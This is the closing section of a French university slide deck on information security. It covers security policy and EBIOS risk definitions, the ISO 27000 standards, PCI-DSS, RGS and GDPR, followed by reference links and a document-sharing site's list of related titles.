Les VPN (IPSEC, VPN-SSL, openvpn, wireguard)
La sécurisation d’une structure AD
La sécurisation des accès (filaire ou wifi)
Les portails captifs (et leurs limites avec le HTTPS)
Le 802.1x, avec le protocole EAP et ses déclinaisons
(MD5/PEAP/EAP-TTLS/EAP-TLS)
La gestion des spams
L’anonymat sur Internet
La gestion du phishing
Habituer ses utilisateurs
Limiter les dégâts (détection de l’origine des connexions)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 445 / 506

Les sujets connexes 2

La lutte antivirale
Les limites des antivirus / antimalware
La détection et le blocage post-infection (DNS, filtrage URLs)
Les stalkerware
Les ransomware
La communication
La négociation

[Link]@[Link] Sécurité Informatique/ November 28, 2021 446 / 506

Les sujets connexes 3

Les containers
Docker, LXC
Kubernetes
Terraform
Le cloud
Intégration Continue
Jenkins, Travis
Analyse de logs
Graylog
Splunk
SIEM

[Link]@[Link] Sécurité Informatique/ November 28, 2021 447 / 506

Le tracking

Tracking waze
Le problème des cookies
Etes-vous unique ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 448 / 506

Définition de la PSSI

Politique de sécurité des systèmes d’information.

Elle décrit les moyens à employer pour atteindre un certain
niveau de sécurité du SI.
Elle est validée par la plus haute autorité hiérarchique de
l’organisme.
Son point central est l’information, pas l’informatique !

[Link]@[Link] Sécurité Informatique/ November 28, 2021 449 / 506

Définitions

Bien essentiel
Bien support
Evenement redouté
Besoin de sécurité
Source de menaces
Vulnérabilité
Impact
Vraisemblance
Gravité
source Guide Ebios ANSSI

[Link]@[Link] Sécurité Informatique/ November 28, 2021 450 / 506

Définitions

Critères DIC
Disponibilité
Intégrité
Confidentialité
Imputabilité / Traçabilité (complément)
Traitement du risque
Refus du risque
Transfert du risque
Traitement du risque
Risque résiduel
Prise de risque

[Link]@[Link] Sécurité Informatique/ November 28, 2021 451 / 506

Définition : bien essentiel

(primary asset)
Ressource ayant une valeur pour l’organisme, voire être son
socle d’existence
Elle peut être matérielle (composant) ou immatérielle
(données, processus)
Elle est en général "portée" par un bien support
Elle a des besoins de sécurité
par exemple
Liste de clients
Données R&D
Données de santé
Capacité à fournir de l’accès Internet
Fournir des diplômes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 452 / 506

Définition : bien support

Bien sur lequel reposent les biens essentiels

Il peut être matériel (serveurs informatiques, local, personne,
etc.)
ou immatériel (organisation, système d’information,
programme)
Il a des vulnérabilités
par exemple
Prestataire
Administrateur système
Réseau
Site web

[Link]@[Link] Sécurité Informatique/ November 28, 2021 453 / 506

Définition : événement redouté

Scénario "global" qui synthétise ce que craint le plus

l’organisme
par exemple
Un pirate manipule les données de santé de clients nécessaire à
leur survie, occasionnant l’hospitalisation ou la mort de
certains d’entre eux.
Les données de recherche sont volées par un concurrent qui
dépose un brevet.
Un hacktiviste récupère les documents de négociations avec un
partenaire ayant mauvaise presse et les diffuse sur Internet.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 454 / 506

Définition : besoin de sécurité

Expression du besoin opérationnel suivant les critères DIC

par exemple
Système de freinage : ne doit pas être indisponible plus de
0,4ms
Serveur de messagerie : ne doit pas être indisponible plus de 2
heures
Somme de rachat d’un concurrent : ne doit être connu que de
la direction
Informations sanguines d’un patient : peut ne pas être intègre
tant que l’on peut le détecter

[Link]@[Link] Sécurité Informatique/ November 28, 2021 455 / 506

Définition : Source de menaces

Entité physique qui rend possible la réalisation d’un risque.

Cette entité est dotée de
d’un type (humain ou environnemental)
d’une expertise
d’une motivation
de ressources
par exemple
une tempête,
un concurrent,
un ancien expert du service informatiquee licencié,
un virus informatique.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 456 / 506

Définition : vulnérabilité

fragilité d’un bien support pouvant entrainer la mise en défaut

d’un besoin de sécurité d’un bien essentiel.
par exemple
faille dans un serveur web
corruptibilité d’un employé
inconscience technique d’un personnel

[Link]@[Link] Sécurité Informatique/ November 28, 2021 457 / 506

Définition : vraisemblance

Probabilité de survenue d’un scenario de menace

par exemple
minime: ne devrait pas se produire
significative: pourrait se produire
forte: devrait se produire d’ici quelques temps
maximale: devrait se produire bientôt

[Link]@[Link] Sécurité Informatique/ November 28, 2021 458 / 506

Définition : gravité

Niveau des effets d’un événement redouté

par exemple
négligeable : aucune difficulté à surmonter
limité : quelques difficultés (perte financière, de temps) pour
surmonter
importante : sérieuses difficultés (impact à plus long terme)
critique: insurmontable (survie menacée)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 459 / 506

Définition : Exemple de graphe

[Link]@[Link] Sécurité Informatique/ November 28, 2021 460 / 506

Définition : impact

Conséquences d’un non respect des besoins de sécurité d’un

bien essentiel.
Directes ou indirectes
sur l’organisme ou son environnement (partenaires, etc.)
par exemple
perte de crédibilité internationale
perte d’un marché
perte d’un partenariat
arrêt du processus de paye
inondation de la salle machine

[Link]@[Link] Sécurité Informatique/ November 28, 2021 461 / 506

Définitions : Disponibilité

Les biens sont-ils accessibles au moment voulu ?

Echelle (très très dépendant du périmètre)
journée
demi-journée
demi-heure
Echelle : système de freinage
demi-seconde
dixième de seconde
millième de seconde

[Link]@[Link] Sécurité Informatique/ November 28, 2021 462 / 506

Définitions : Intégrité

Les biens sont-ils complets et exacts ?

Echelle
négligeable: peut ne pas être intègre
acceptable: peut ne pas être intègre, mais cela doit être
détecté. Ou bien la variation est mineure et ne gêne que peu
les utilisateurs.
intègre: doit être intègre.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 463 / 506

Définitions : Confidentialité

Les biens sont-ils accessibles suivant des autorisations ?

Echelle
public: le bien essentiel est public
restreint: ne doit être accessible qu’à un groupe
confidentiel: ne doit être accessible qu’à certaines personnes
(direction, responsables, etc.)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 464 / 506

Définition : Refus du risque

On sort de la situation à risque

par exemple
Sortie d’un pays en instabilité politique
Abandon d’un projet de site web
Mise au placard d’un employé indélicat plutôt que licenciement.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 465 / 506

Définition : Transfert du risque

Utilisation d’un partenaire qui va prendre le risque à notre

place.
par exemple
Passage par un partenaire local dans le pays en instabilité
Création du site web par un partenaire certifié sécurité
Achat d’une assurance.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 466 / 506

Définition : Traitement du risque

Parfois appelé atténuation du risque

Mise en place de processus visant à réduire
la vraisemblance du risque
les impacts du risque
par exemple
Embauche d’une société de protection militaire
Achat d’un WAF de haut niveau
Négociation d’une prime de départ conséquente

[Link]@[Link] Sécurité Informatique/ November 28, 2021 467 / 506

Définition : Risque résiduel

Après toutes les mesures de transferts et d’atténuation ou

suppression, il existe souvent un risque réduit. C’est le risque
résiduel.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 468 / 506

Définition : Prise de risque

Parfois appelé acceptation du risque

Le risque est considéré comme faible par rapport au bénéfice,
donc on y va.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 469 / 506

Comment rédiger une PSSI ?

Quels sont les biens essentiels de l’organisme ?

Quels sont les biens support de ces biens essentiels ?
Quelles sont les vulnérabilités de ces biens support ?
Quels sont les sources de menaces ?
Quels sont les impacts ?
Quelles sont les vraisemblances ?
Quels sont les risques ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 470 / 506

Les normes sécurité

Les normes de sécurité

[Link]@[Link] Sécurité Informatique/ November 28, 2021 471 / 506

Les normes sécurité

Pourquoi ?
Besoin de définir des bonnes pratiques (pas de notion d’absolu
!)
Besoin de parler de la même chose
Besoin de certification (évaluation) commune
Evaluation des hommes (pour le recrutement)
Evaluation des entreprises (pour la publicité, ou les cercles de
confiance)
Appliquer à la sécurité les principes de la qualité

[Link]@[Link] Sécurité Informatique/ November 28, 2021 472 / 506

La qualité

C’est quoi ?
Tradition anglo-saxonne
Objectif : s’améliorer, RIEN DE PLUS
Roue de deming (PDCA)
Plan : je prévois ce que je vais faire
Do : je fais ce que j’ai prévu
Check : je vérifie (mesure) que j’ai fait ce que j’ai prévu
Act : je constate ce qui n’a pas marché pour le corriger
On recommence
Concept associé aux normes ISO 9001
Ce sont des documents payants à récupérer sur le site de l’ISO
: 100 à 150 €

[Link]@[Link] Sécurité Informatique/ November 28, 2021 473 / 506

La qualité : sous-entendus

On écrit ce que l’on veut faire

On écrit ce que l’on fait
On définit des indicateurs pour mesurer ce que l’on fait
Le modèle PDCA s’applique de manière "fractale"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 474 / 506

Les normes ISO 27000

Pourquoi ?
ISO 27000 : Le vocabulaire
ISO 27001 : Le système de gestion de la sécurité SMSI
ISO 27002 : Les bonnes pratiques de la sécurité
ISO 27003 : Installation d’un SMSI
ISO 27004 : Indicateurs et tableaux de bord
ISO 27005 : La gestion du risque
ISO 27006 : Les audits de sécurité
ISO 27007 : Guide pour l’audit d’un SMSI

[Link]@[Link] Sécurité Informatique/ November 28, 2021 475 / 506

Les normes ISO 27000 sectorielles

ISO 27011 : Guide pour le secteur des télécommunications

ISO 27032 : Cybersécurité
ISO 27033 : Sécurité des réseaux informatiques
ISO 27034 : Sécurité applicative
ISO 27799 : Guide pour le secteur de la santé
Plus les autres (ISO 27012, ISO 27013, ...)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 476 / 506

La norme ISO 27000

S’occupe des définitions et du vocabulaire

Publiée en 2009 et révisée en 2012
Ne donne pas lieu à une certification
Permet de parler de la même chose
Risque ?
Menace ?
Vulnérabilité ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 477 / 506

La norme ISO 27001

Mise en place d’un SMSI (Système de Management de la Sécurité

de l’Information)
Publiée en 2005, révisée en 2013
Donne lieu à une certification d’organisme
C’est quasiment une méta-norme qui référence les autres
La sécurité c’est "ni trop, ni trop peu"
Cette certification peut être "fumigène" : choix du périmètre
et des contraintes de sécurité
en aout 2007 : 5 certif françaises, 73 allemandes, 2280
japonaises

[Link]@[Link] Sécurité Informatique/ November 28, 2021 478 / 506

La norme ISO 27002

Ensemble de bonnes pratiques de la sécurité

Publiée
ex norme ISO 17799
133 mesures à prendre (mais pas toutes, car pas toujours
adaptées !)
11 chapitres
39 objectifs

[Link]@[Link] Sécurité Informatique/ November 28, 2021 479 / 506

La norme ISO 27003

Guide d’implémentation d’un SMSI

Publiée en 2010

[Link]@[Link] Sécurité Informatique/ November 28, 2021 480 / 506

La norme ISO 27004

Donne une liste d’indicateurs de sécurité à produire

A l’état de Draft
Ne donne pas lieu à une certification
20 indicateurs maximum
Indicateurs doivent être associés à des objectifs
Pas toujours "informatiques"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 481 / 506

La norme ISO 27005

Tout ce qui tourne autour de la gestion du risque

informatique.
Ne donne pas les solutions pour diminuer le risque (les autres
normes s’en chargent)
Intégré dans la norme ISO31000 (gestion du risque global).
Donne lieu à une certification individuelle
En concurrence avec les méthodes Mehari, Ebios
Définition de mesures de risques
Définition de scénarii de menaces

[Link]@[Link] Sécurité Informatique/ November 28, 2021 482 / 506

La norme ISO 27006

Exigences que doivent remplir les organismes d’audit et de

certifications des SMSI.
Publiée et mise à jour en 2011
Donne lieu à une certification

[Link]@[Link] Sécurité Informatique/ November 28, 2021 483 / 506

La norme ISO 27007

Guide pour l’audit d’un SMSI

Draft
Recueil de bonnes pratiques

[Link]@[Link] Sécurité Informatique/ November 28, 2021 484 / 506

La norme ISO 27011

Guide pour le secteur des télécommunications

Publié en 2008

[Link]@[Link] Sécurité Informatique/ November 28, 2021 485 / 506

La norme ISO 27012

Guide pour le secteur des finances

Proposée (Stade avant le Draft) puis abandonnée.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 486 / 506

La norme ISO 27013

Guide pour le secteur de l’industrie

publiée en 2012.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 487 / 506

La norme ISO 27015

Directives pour l’accréditation

Publiée en 2012

[Link]@[Link] Sécurité Informatique/ November 28, 2021 488 / 506

La norme ISO 27016

Audits et revues
Publiée en 2014

[Link]@[Link] Sécurité Informatique/ November 28, 2021 489 / 506

La norme ISO 27031

Continuité d’activité
Publiée en 2011
Basée sur un British standard (BS 25999) et le (BC/DR
SS507) singapourien

[Link]@[Link] Sécurité Informatique/ November 28, 2021 490 / 506

La norme ISO 27032

Cybersécurité (Internet)
Publiée en 2012

[Link]@[Link] Sécurité Informatique/ November 28, 2021 491 / 506

La norme ISO 27033

Sécurité des réseaux informatiques

Publiée de 2009 à 2014 suivant les parties.
révision de l’ISO 18028
Découpé en 7 parties (27033-1, 27033-2, ...)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 492 / 506

La norme ISO 27034

Sécurité Applicative
Publiée en 2011

[Link]@[Link] Sécurité Informatique/ November 28, 2021 493 / 506

La norme ISO 27799

Guide pour le secteur de la santé

Publiée en 2008
ISO 27002 spécifique au secteur de la santé

[Link]@[Link] Sécurité Informatique/ November 28, 2021 494 / 506

Comment cela s’applique ?

Le coeur est la norme ISO27001 et référence la plupart des autres.

C’est un modèle d’amélioration (PDCA)
On peut (doit) commencer petit
On peut (doit) accepter le droit à l’erreur
On fait une analyse de risques de haut niveau
On sélectionne les risques à traiter
On regarde les bonnes pratiques (27002) qui correspondent
On fait une analyse du risque pour le reste (27005)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 495 / 506

Quelques liens

[Link] Association pour la

promotion de l’ISO 27001
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 496 / 506

D’autres normes

D’autres normes, plus sectorielles existent pour améliorer la

sécurité
PCI-DSS et PA-DSS pour le secteur marchand utilisant les
cartes bancaires
RGS (1 et 2) pour l’état et ses administrations

[Link]@[Link] Sécurité Informatique/ November 28, 2021 497 / 506

PCI-DSS

Payment Card Industry

Norme bancaire réclamée à partir d’un certain C.A. associé à
Internet
Gratuite.
135 pages
12 conditions à respecter
La moitié en technique
La moitié en organisationnel
Actuellement en version 3.2
N’est pas une assurance de sécurité, mais de démarche
sécurité.
N’empêche absolument pas de se faire pirater du sol au
plafond.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 498 / 506

RGS

Référentiel général de sécurité (RGS)

Version 2 publiée le 13 juin 2014, applicable depuis le 1er
juillet 2014
Concerne les téléservices de l’état.
Règles sur les applications web
Règles sur les certificats
Document
25 pages
5 annexes sur les certificats (de 14 à 89 pages)
3 annexes sur les mécanismes cryptographiques (de 29 à 63
pages)
1 annexe sur les prestataires d’audit

[Link]@[Link] Sécurité Informatique/ November 28, 2021 499 / 506

Guide d’hygiène informatique

Rédigée par l’ANSSI

40 règles
50 pages
Pas une norme, uniquement des bonnes pratiques
Inapplicable en totalité.
Mais quelques évidences... pas toujours appliquées.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 500 / 506

PSSI Etat

Publiée le 17 juillet 2014

Version 1.0
42 pages très succintes
ne concerne que les SI "classiques"
doit être appliquée dans les 3 ans après la publication

[Link]@[Link] Sécurité Informatique/ November 28, 2021 501 / 506

Le RGPD

Règlement Général de Protection des Données

ou GDPR (General Data Protection Regulation)
Applicable à partir du 25 mai 2018
Directive européenne (applicable directement)
Concerne la protection des données privées, pas la sécurité
mais cela l’implique
Créé un DPO (Data Protection Officer) / DPD (Délégué à la
Protection des Données)
mais qui ne doit pas être le RSSI (Jugement Allemand)
Implique une analyse d’impact (PIA) à partir de certaines
données.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 502 / 506

La RGPD
Les données à caractère personnel doivent être
« traitées de manière licite, loyale et transparente au regard de
la personne concernée ».
« collectées pour des finalités déterminées, explicites et
légitimes, et ne pas être traitées ultérieurement d’une manière
incompatible avec ces finalités ».
« adéquates, pertinentes et limitées à ce qui est nécessaire au
regard des finalités pour lesquelles elles sont traitées ».
« exactes et, si nécessaire, tenues à jour », sachant que toutes
les mesures raisonnables seront prises pour corriger les
inexactitudes.
« conservées sous une forme permettant l’identification des
personnes concernées pendant une durée n’excédant pas celle
nécessaire au regard des finalités pour lesquelles elles sont
traitées (sauf hypothèse d’archivage dans l’intérêt public, de
recherche scientifique, historique ou statistique).
« traitées de façon à garantir une sécurité appropriée »
[Link]@[Link] Sécurité Informatique/ November 28, 2021 503 / 506
Une revue papier

MISC (pluridisciplinaire, complexe, reconnue)

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 504 / 506

Les organismes pour vous aider

De nombreux organismes ou associations fournissent d’excellents

supports pour améliorer sa sécurité
l’OSSIR [Link]
le CLUSIF [Link]
les CLUSIRs : émanations régionales du CLUSIF
les CERTs dont le CERTA [Link]
le SANS [Link]
la NSA [Link] d’excellents documents
techniques de sécurisation
CAIDA [Link]
l’OWASP [Link]
l’association Club 27001 [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 505 / 506

Urlographie : informations

Quelques sites web référents dans le domaine de la sécurité.

[Link] Podcast en français
[Link] Blog en français avec sa
chaîne Youtube
[Link] Blog en français
[Link] Blog en anglais
[Link] Blog en français
[Link] Aggrégateur en anglais
[Link] Blog en français
[Link] Blog en
français.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 506 / 506

Vous aimerez peut-être aussi

Linux
Pas encore d'évaluation
Linux
6 pages
Linux 1
Pas encore d'évaluation
Linux 1
44 pages
Sécurité et conception réseau CCNA 1
Pas encore d'évaluation
Sécurité et conception réseau CCNA 1
61 pages
Concepts Clés de la Sécurité Informatique
Pas encore d'évaluation
Concepts Clés de la Sécurité Informatique
149 pages
Commandes essentielles sur Manjaro Linux
Pas encore d'évaluation
Commandes essentielles sur Manjaro Linux
17 pages
Techniques D'intrusion Dans Les Réseaux
100% (17)
Techniques D'intrusion Dans Les Réseaux
25 pages
Configurer un VPN sous Windows 10
100% (1)
Configurer un VPN sous Windows 10
1 page
0241 Formation Securite Informatique PDF
Pas encore d'évaluation
0241 Formation Securite Informatique PDF
165 pages
La Commande Netsh
100% (1)
La Commande Netsh
4 pages
Déploiement Automatisé de Logiciels M2L
Pas encore d'évaluation
Déploiement Automatisé de Logiciels M2L
2 pages
Guide DNS : Concepts, Sécurité et Comparaison OS
Pas encore d'évaluation
Guide DNS : Concepts, Sécurité et Comparaison OS
16 pages
Creer Son Serveur FTP
Pas encore d'évaluation
Creer Son Serveur FTP
11 pages
Sécurité Et Partage
Pas encore d'évaluation
Sécurité Et Partage
177 pages
Cours 05
Pas encore d'évaluation
Cours 05
48 pages
Atelier: Collecte de Malwares Avecun Honeypot
Pas encore d'évaluation
Atelier: Collecte de Malwares Avecun Honeypot
7 pages
Module 6 - Stratégies de Défense Et Sécurité Des Réseaux
100% (2)
Module 6 - Stratégies de Défense Et Sécurité Des Réseaux
67 pages
Configuration Et Dépannage Du Système DNS - PPT Télécharger
Pas encore d'évaluation
Configuration Et Dépannage Du Système DNS - PPT Télécharger
27 pages
Gestion Partage & Permissions NTFS
Pas encore d'évaluation
Gestion Partage & Permissions NTFS
47 pages
Hacking Serveur Web Partie 2
Pas encore d'évaluation
Hacking Serveur Web Partie 2
24 pages
Guide des Éditions Windows Server 2012
Pas encore d'évaluation
Guide des Éditions Windows Server 2012
8 pages
07-Sécurisation de L'infrastructure de Virtualisation
Pas encore d'évaluation
07-Sécurisation de L'infrastructure de Virtualisation
22 pages
Mise en Place Du Lab CEHv11
Pas encore d'évaluation
Mise en Place Du Lab CEHv11
16 pages
Modes d'authentification Windows Hello
Pas encore d'évaluation
Modes d'authentification Windows Hello
14 pages
La Politique de Securite Informatique
Pas encore d'évaluation
La Politique de Securite Informatique
3 pages
Guide du Test de Pénétration
100% (1)
Guide du Test de Pénétration
27 pages
Système D'exploitation Linux01
Pas encore d'évaluation
Système D'exploitation Linux01
74 pages
TP Debian
Pas encore d'évaluation
TP Debian
26 pages
Cours1 Intro Securite 052016
Pas encore d'évaluation
Cours1 Intro Securite 052016
37 pages
Techniques de Hacking Ethique
Pas encore d'évaluation
Techniques de Hacking Ethique
112 pages
Forensic Macro Word
100% (1)
Forensic Macro Word
8 pages
ASR S1 Administration Linux
Pas encore d'évaluation
ASR S1 Administration Linux
86 pages
Guide Complet sur la Virtualisation et la Gestion des Data Centers
Pas encore d'évaluation
Guide Complet sur la Virtualisation et la Gestion des Data Centers
4 pages
Kali Book FR
Pas encore d'évaluation
Kali Book FR
40 pages
Chapitre 3 - Acces Initial - p2
Pas encore d'évaluation
Chapitre 3 - Acces Initial - p2
25 pages
1.5 - Trucs Et Astuces Du Registre
100% (1)
1.5 - Trucs Et Astuces Du Registre
147 pages
Protocole TLS : Sécurité et Applications
Pas encore d'évaluation
Protocole TLS : Sécurité et Applications
40 pages
Autorisations NTFS
Pas encore d'évaluation
Autorisations NTFS
5 pages
Introduction A La Sécurité
Pas encore d'évaluation
Introduction A La Sécurité
8 pages
Tutorial Cryptographie Asymétrique GnuPG
Pas encore d'évaluation
Tutorial Cryptographie Asymétrique GnuPG
11 pages
Travail Sur L'analyse Forensic Informatique
100% (1)
Travail Sur L'analyse Forensic Informatique
95 pages
Gestion d'Incidents Informatiques avec GLPI
Pas encore d'évaluation
Gestion d'Incidents Informatiques avec GLPI
3 pages
Configuration et dépannage DNS Microsoft
Pas encore d'évaluation
Configuration et dépannage DNS Microsoft
44 pages
Windows Serveur L3
Pas encore d'évaluation
Windows Serveur L3
55 pages
Formation - Admin Securite - CompTIA Security Syo 401
Pas encore d'évaluation
Formation - Admin Securite - CompTIA Security Syo 401
257 pages
Resume Theorique M209 V1 0909
100% (1)
Resume Theorique M209 V1 0909
127 pages
Securite Administrative Des Reseaux
Pas encore d'évaluation
Securite Administrative Des Reseaux
8 pages
Craquage Wi-Fi avec Kali Linux : Guide et Prévention
Pas encore d'évaluation
Craquage Wi-Fi avec Kali Linux : Guide et Prévention
21 pages
Chapitre 2 - Introduction Au Système D'exploitation Linux
100% (1)
Chapitre 2 - Introduction Au Système D'exploitation Linux
80 pages
Techserv Chap10 Interop
Pas encore d'évaluation
Techserv Chap10 Interop
17 pages
Test de Penetration Avec BackTRack 5
Pas encore d'évaluation
Test de Penetration Avec BackTRack 5
41 pages
Lab4-Configuration Des Réseaux Virtuels
Pas encore d'évaluation
Lab4-Configuration Des Réseaux Virtuels
10 pages
Tp-Powershell TSSR Win
Pas encore d'évaluation
Tp-Powershell TSSR Win
3 pages
Etude Et Concepts de La Securite Operationnelle Et Organisationnelle
Pas encore d'évaluation
Etude Et Concepts de La Securite Operationnelle Et Organisationnelle
47 pages
Guide d'utilisation de Metasploit
100% (1)
Guide d'utilisation de Metasploit
17 pages
Tpkalilinux Metasploit
Pas encore d'évaluation
Tpkalilinux Metasploit
2 pages
Partage de Dossiers et GPO Windows
Pas encore d'évaluation
Partage de Dossiers et GPO Windows
10 pages
Sécurité Informatique
100% (5)
Sécurité Informatique
134 pages
Guide Complet sur la Sécurité Informatique
Pas encore d'évaluation
Guide Complet sur la Sécurité Informatique
459 pages
Cours Securite Miage
Pas encore d'évaluation
Cours Securite Miage
257 pages
Guide de Sécurité Informatique
Pas encore d'évaluation
Guide de Sécurité Informatique
351 pages
Comprendre les processus en systèmes d'exploitation
Pas encore d'évaluation
Comprendre les processus en systèmes d'exploitation
13 pages
Document Divalto
Pas encore d'évaluation
Document Divalto
28 pages
Github
Pas encore d'évaluation
Github
1 page
Gestion Innovante de Salle de Sport
Pas encore d'évaluation
Gestion Innovante de Salle de Sport
20 pages
Projet Virtu Réseau Efrei
Pas encore d'évaluation
Projet Virtu Réseau Efrei
28 pages
XMCO ActuSecu 41 Tests Intrusion Android PDF
Pas encore d'évaluation
XMCO ActuSecu 41 Tests Intrusion Android PDF
78 pages
Correction PPT
Pas encore d'évaluation
Correction PPT
28 pages
Installation d'Oracle 11g sur Windows
100% (1)
Installation d'Oracle 11g sur Windows
7 pages
TD 2
Pas encore d'évaluation
TD 2
2 pages
Memoire BIDUAYA Symphorien
Pas encore d'évaluation
Memoire BIDUAYA Symphorien
85 pages
Hadoop Hdfs and Yarn Mapreduce
Pas encore d'évaluation
Hadoop Hdfs and Yarn Mapreduce
63 pages
QCM Answers
100% (1)
QCM Answers
5 pages
CV 21052023 Java
Pas encore d'évaluation
CV 21052023 Java
5 pages
DS Sepc 20 11 2015
Pas encore d'évaluation
DS Sepc 20 11 2015
9 pages
Recrutement CCMG: 3 Postes Clés en Microfinance
Pas encore d'évaluation
Recrutement CCMG: 3 Postes Clés en Microfinance
10 pages
TP 3
100% (1)
TP 3
2 pages
Chapitre 5 Les Fonctions en C
Pas encore d'évaluation
Chapitre 5 Les Fonctions en C
15 pages
Introduction Générale
Pas encore d'évaluation
Introduction Générale
2 pages
ULB Info-F206 2011-2012 Projet
Pas encore d'évaluation
ULB Info-F206 2011-2012 Projet
4 pages
Introduction aux FPGA et leurs atouts
Pas encore d'évaluation
Introduction aux FPGA et leurs atouts
32 pages
011l02310723v7n3 o Dembele Et Al. Gestion Dossier Patient
Pas encore d'évaluation
011l02310723v7n3 o Dembele Et Al. Gestion Dossier Patient
21 pages
Reseau QCM2018.
Pas encore d'évaluation
Reseau QCM2018.
7 pages
2.1. Installation Du Routeur Cisco c7200: Objectifs
Pas encore d'évaluation
2.1. Installation Du Routeur Cisco c7200: Objectifs
8 pages
Manuel des Procédures Comptables
100% (2)
Manuel des Procédures Comptables
71 pages
Machine Learning
Pas encore d'évaluation
Machine Learning
4 pages
Notes Du Cours de Systemes Embarques
Pas encore d'évaluation
Notes Du Cours de Systemes Embarques
50 pages
Concepts de Pointeurs et Listes Chaînées
Pas encore d'évaluation
Concepts de Pointeurs et Listes Chaînées
26 pages
Programmation en Assembleur Z80
Pas encore d'évaluation
Programmation en Assembleur Z80
99 pages
Introduction au langage Java et son environnement
Pas encore d'évaluation
Introduction au langage Java et son environnement
15 pages
Thibault - Aubriot@univ-St-Etienne - FR: M2101: Réseaux Locaux Et Équipements Actifs
Pas encore d'évaluation
Thibault - Aubriot@univ-St-Etienne - FR: M2101: Réseaux Locaux Et Équipements Actifs
54 pages